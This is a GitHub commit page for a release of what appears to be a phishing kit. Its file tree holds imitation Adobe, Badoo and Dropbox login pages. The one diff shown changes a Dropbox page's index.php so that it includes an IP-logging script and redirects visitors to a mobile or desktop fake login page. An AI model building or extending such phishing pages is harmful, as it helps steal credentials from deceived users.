Skip to content

Commit 7a525d0

Browse files
authored
Release 2.3.5
2 parents f1dcd46 + ccc3575 commit 7a525d0

File tree

110 files changed

+8334
-12751
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

110 files changed

+8334
-12751
lines changed

.sites/adobe/bg.jpg

111 KB
Loading

.sites/adobe/favicon.ico

5.3 KB
Binary file not shown.

.sites/adobe/#.html

+157-527
Large diffs are not rendered by default.

.sites/adobe/logo.svg

+24
Loading

.sites/badoo/favicon.ico

4.06 KB
Binary file not shown.

.sites/badoo/#.html

+173-304
Large diffs are not rendered by default.

.sites/badoo/logo.svg

+4
Loading

.sites/dropbox/dropbox1.png

-67.3 KB
Binary file not shown.

.sites/dropbox/dropbox2.png

-1.9 KB
Binary file not shown.

.sites/dropbox/dropbox3.png

-387 Bytes
Binary file not shown.

.sites/dropbox/dropbox4.svg

-24
This file was deleted.

.sites/dropbox/dropbox5.svg

-11
This file was deleted.

.sites/dropbox/dropbox6.svg

-4
This file was deleted.

.sites/dropbox/favicon.ico

4.19 KB
Binary file not shown.

.sites/dropbox/index.php

+9-5
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,9 @@
1-
<?php
2-
include 'ip.php';
3-
header('Location: login.html');
4-
exit
5-
?>
1+
<?php include 'ip.php';?>
2+
<script type="text/javascript">
3+
if (screen.width <= 699) {
4+
document.location = "mobile.html";
5+
}
6+
else {
7+
document.location = "login.html";
8+
}
9+
</script>

0 commit comments

Comments
 (0)